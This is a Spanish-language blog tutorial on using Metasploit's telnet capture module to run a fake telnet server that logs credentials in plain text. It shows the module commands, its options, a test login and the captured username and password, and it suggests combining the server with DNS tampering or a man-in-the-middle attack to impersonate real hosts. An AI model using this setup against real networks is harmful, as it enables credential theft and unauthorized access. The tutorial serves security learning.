metasploit, telnet server fake

telnet es uno de esos servicios que todavía está presente en muchos equipos (importantes) y que presenta unos graves fallos de seguridad, como por ejemplo no cifrar los datos que se envían ni reciben. Éste es el principal motivo por el que ssh le ganó terreno. Hacen "lo mismo", pero ssh securizado. Con metasploit podemos crear un servidor telnet fake, que quede a la escucha en el puerto que queramos (por defecto, puerto 23) y que permita capturar las credenciales de acceso cuando un usuario intente acceder. Vamos a ver cómo funciona.
msf> use auxiliary/server/capture/telnet
msf auxiliary(telnet)> show options

Module options (auxiliary/server/capture/telnet):

Name       Setting Required  Description
----       ------- --------  -----------
SRVHOST    0.0.0.0  yes      The local host to listen on.
SRVPORT    23       yes      The local port to listen on.
SSL        false    no       Negotiate SSL for incoming connections
SSLCert             no       Path to a custom SSL certificate
SSLVersion SSL3     no       Specify the version of SSL that should be used

msf auxiliary(telnet)> run
[*] Auxiliary module execution completed

[*] Server started.
Tras arrancar el servidor telnet fake, simplemente lo dejamos a la escucha de alguien que se conecte y nos de unas credenciales válidas. Vamos ahora a simular una conexión al servidor y ver lo que aparece.
shell> telnet 192.168.1.33
Trying 192.168.1.33...
Connected to 192.168.1.33.
Escape character is '^]'.

Welcome.

Login: root
Password: 

Login failed
Y vemos en texto plano el usuario/contraseña y la IP desde la que se realiza la conexión.
[*] TELNET LOGIN 192.168.1.34:51803 root / admin
Efectivamente esto por si sólo no sirve de nada, ya que no hay ningún motivo por el que dejar un telnet a la escucha a la espera de conexiones válidas, sin embargo si este fake lo empleamos apoyándonos en una "alteración" de un DNS o un ataque MITM, podemos hacer pasar la máquina fake por un equipo real, capturando así credenciales válidas para el equipo que vayamos a suplantar.


No hay comentarios :

Publicar un comentario

Formulario de contacto

Nombre

Correo electrónico *

Mensaje *

Últimos comentarios